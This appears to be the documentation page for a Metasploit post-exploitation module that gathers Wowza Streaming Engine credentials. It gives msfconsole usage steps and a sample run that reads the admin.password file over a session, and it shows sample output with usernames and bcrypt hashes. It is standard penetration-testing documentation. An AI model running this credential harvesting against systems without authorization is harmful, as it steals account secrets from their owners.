Files
metasploit-gs/documentation/modules/post/multi/gather/wowza_streaming_engine_creds.md
T
2023-03-09 01:31:23 +11:00

1.3 KiB

Vulnerable Application

This module collects Wowza Streaming Engine user credentials.

Installation Steps

Download and install Wowza Streaming Engine.

Verification Steps

  1. Start msfconsole
  2. Get a session
  3. Do: use post/multi/gather/wowza_streaming_engine_creds
  4. Do: set SESSION <session id>
  5. Do: run

Options

Scenarios

Wowza Streaming Engine Manager Version 4.8.20+1 (build 20220919162035) on Ubuntu 22.04

msf6 > use post/multi/gather/wowza_streaming_engine_creds 
msf6 post(multi/gather/wowza_streaming_engine_creds) > set session 1
session => 1
msf6 post(multi/gather/wowza_streaming_engine_creds) > run

[*] Parsing file /usr/local/WowzaStreamingEngine/conf/admin.password
Wowza Streaming Engine Credentials
==================================

Username  Password                                                      Groups         Encoding
--------  --------                                                      ------         --------
guest     $2y$10$HbioW4tMn6aqtMjrXWxbp.sCCGkRL2bM2prNJG0elnLlcLnsV5XDK  basic          bcrypt
user      $2y$10$PiMwykGY8H9ZX45AwjgAluCXHwvswpCFrIsHmCKqLtSJLITXagjwu  admin|advUser  bcrypt

[+] Credentials stored in: /root/.msf4/loot/20230306035212_default_192.168.200.158_host.wowzastream_500725.txt
[*] Post module execution completed